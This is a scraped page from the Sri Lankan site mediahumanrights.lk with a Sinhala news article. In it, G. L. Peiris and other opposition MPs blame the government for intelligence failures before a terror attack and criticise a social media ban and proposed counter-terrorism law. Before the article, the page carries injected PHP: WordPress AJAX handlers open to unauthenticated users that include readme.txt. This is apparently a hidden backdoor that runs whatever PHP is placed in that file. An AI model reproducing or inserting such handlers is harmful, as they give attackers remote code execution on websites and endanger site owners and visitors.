if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ජනාධිපතිට රජයෙන් බැහැර වෙලා රජය විවේචනය කරන්න බෑ - mediahumanrights.lk
mediahumanrights.lk
News Political

ජනාධිපතිට රජයෙන් බැහැර වෙලා රජය විවේචනය කරන්න බෑ

පසුගිය 21වනදා සිදු වු ත්‍රස්ත ප්‍රහාරය සම්බන්දයෙන් රජයේ පාර්ශවයන් දෙක එකිනෙකාට ඇගිලි දිගු කරමින් සිටින බව ශ්‍රී ලංකා පොදුජන පෙරමුනේ සභාපති මහාචාර්ය ජි. එල්. පිරිස් මහතා පවසයි.

අද (29) එම පක්ෂ කර්යාලයේ පැවති මාධ්‍ය හමුවක් අමතමින් ඒ මහතා මේ බව පැවසීය.

එකට එකතු වී රට පාලනය කිරීමට මෙම පිරිස ජනතාවගෙන් ජන වරමක් ලබා ගත්තද අද ජනාධිපති ශ්‍රී ලංකා නිදහස් පක්ෂයේ ලෙසත් අගමැති රක්සත් ජාතික ලක්ෂයේ ලෙසත් බෙදි සිටිනබව ඒ මහතා පවසයි.

එහිද වැඩි දුරටත් අදහස් දැක්වු මහාචාර්ය ජි. එල්. පිරිස් මහතා,

“ජනාධිපතිතුමා බුද්ධි අංශ දුර්වල කිරීමේ වගකීම රජය භාරගත යුතු බව කියනවා. කවුද රජය. ජනාධිපති ඇතුලු කැබිනට් මණ්ඩලය. රජයේ උච්ඡතම ස්ථානය ජනාධිපතිවරයායි. ජනාධිපතිවරයාට රජයෙන් බැහැර වෙලා රජය විවේඡනය කරන්න බැහැ. 

නිව්යෝක් ටයිම් පුවත්පතේ පළවෙනි පිටුවේ තියෙනවා ශ්‍රී ලංකා රජයට බුද්ධි අංශවලින් තොරතුරු ලැබුණු බව. පුද්ගලයින්ගේ නම් දුරකතන අංක, සාකච්ඡා පැවැත්වූ ස්ථාන පවා එහි සදහන් වෙනවා. මේ තොරතුරු රජය අතට පත්ව තිබුණත් පියවරක් ගත්තේ නැහැ. මේ තොරතුරු අගරදගුරුවරයාට දිලා තිබුණා නම් කිසිදු දේව මෙහෙයක් පවත්වන්නේ නැහැ. 

යුද හමුදාපතිවරයා කියන්නේ මේ ගැන තොරතුරක් තිබුණා නම් ඔවුන් ක්‍රියාත්මක වෙන බවයි. හොටල් ක්ෂේත්‍රයේ අයට මොන යම් හෝ තොරතුරක් ලැබී තිබුණානම් හෝටල් ආරක්ෂා කර ගන්නවා. මේකට ජනාධිපතිතුමා අගමැතිතුමා වගේම සමස්ත රජයම වගකිව යුතුයි. 

රජයේ ස්ථාවරය මෙහි වගකීම භාරගෙන ආරක්ෂක ලේකම් හා පොලිස්පතිවරයා ඉවත් වීමයි. අපි එය පිළිගන්නේ නැහැ. දේශපාලන අධිකාරියම වග කිව යුතුයි. 

අගමැතිවරයා ස්කයි නිව්ස් සමග සම්මුඛ සාකච්ඡාවකදී නීතිවල අඩුපාඩුවක් තියෙන බව ප්‍රකාශ කර තිබෙනවා. ඒක සම්පූර්ණයෙන් වැරදයි.

එතුමා වගකීමෙන් මිදෙන්න කරන ව්‍යාජ තර්කයක්. ත්‍රස්තවාදය ආරක්ෂා කිරීමේ පනත, මහජන ආරක්ෂණ පනත හා දණ්ඩ නීති සංග්‍රහය කියන පනත් තුනේම ප්‍රමාණවත් විදිවිධාන අඩංගුයි මෙ තත්ත්වය සම්බන්ධයෙන් කටයුතු කරන්න. 

මිහිපිට තිබුණු භයානක ත්‍රස්තවාදී කණ්ඩායමක් මහින්ද රාජපක්ෂ මහතාගේ රජය සමයේ මර්දනය කලේ  මේ නීතිවලින්. ඒ කියන්නේ නීතිවල අඩුපාඩුවක් නෙවෙයි ලැබුණු තොරතුරු වලින් ප්‍රයෝජන ගෙන ජනතාව ආරක්ෂා කිරීමට රජයේ දෙපාර්ශවය අපොහොසත් වීමයි සිදුවුනේ. 

රනිල් වික්‍රමසිංහ මහතා කියනවා මේ සියලු ප්‍රශ්න ඇති වුනේ ප්‍රති ත්‍රස්තවාදි පනත පාර්ලිමේන්තුවේ සම්මත නොවුනු නිසා. පොල් ගාන්නේ නැතිව ඉක්මනින් මෙය සම්මත කරන්නලු. ත්‍රස්තවාදය වැළැක්වීමේ පනත අහෝසි කරන්නයි මේ යන්නේ. එහෙම කරනවා කියලා ජාත්‍යන්තරයට පොරොන්දුවක් දීලා තියෙනවා. “)

එහිදි අදහස් දැක්වු පාර්ලිමේන්තු මන්ත්‍රී සුසිල් ප්‍රේමජයන්ත මහතා,

මේ ආන්ඩුව තොරතුරු ජනගත විම වළක්වන්න සමාජමාධ්‍ය තහනම් කරලා, ආන්ඩුවට එන ප්‍රකෝපය හා අවලාද වෙනතකට යැවීමට දරපු උත්සාහය අපි හෙළා දකිනවා. රාජ්‍ය ආරක්සාව සම්බන්ධයෙන් එවැන්නක් කළාට ප්‍රශ්නයක් නැතත් ජනතාවට යම් යම් සත්‍ය තොරතුරු දැන ගැනීමට තිබුණු හැකියාව වැළැක්වූවා. 

 අගමැතිතුමාගේ පළවෙනි කතාවෙන් කිව්වේ ගෝලීය ත්‍රස්තවාදයක් කියලා විශ්වීය ත්‍රස්තවාදයට සම්බන්ධයි කිව්වා. ඊට පස්සේ ස්කයි නිව්ස් එකට කියනවා මෙම්පනත ගෙනාවේ නැත්නම්නඩු පවරන්න බැහැලු. 

මම අභියෝග කරනවා අගමැතිතුමාට පුලුවන් නම් පෙන්වන්න තියෙන පනතෙනක් කාටද නඩු පවරන්න බැරි කියලා. පාර්ලිමේන්තුව පොල් ගහන්නේ නැතිව මේක සම්මත කරන්නලු අගමැති එතුමා. 

කමිටු පත්කලේ පාර්ලිමේන්තුව. පොල් ගාන්නේ නැතිව සම්මත කරන්නලු. අපිට කියන්නෙ වෙන්නේ පොල් ගාන්නේ නැතිව අයින් වෙන්න කියලයි. 

වගකීම ගන්න බැරිනම් පොල් ගාන්නේ නැතිව අයින් වෙන්න.  “)

එහිදි පාර්ලිමේන්තු මන්ත්‍රී රෝහිත අබේගුණවර්ධන මහතා පාර්ලිමේන්තු මන්ත්‍රී කෙහෙළිය රඹුක්වැල්ල මහතා ද අදහස් දැක්වීය.

(under the courtesy of adaderana.lk news web)

Related posts

අර්ජුන් ඇලෝසියස්ට නොතීසි

Shiran Viraj

ඥාතින් භාර නොගත් කොවිඩ් ආසාදිත මළ සිරුරූ රජයේ වියදමින් ආදාහනය කරයි

Shiran Viraj

වත්මන් රජය මහානාහිමි අනුශාසනා පිළිගන්නෑ

Shiran Viraj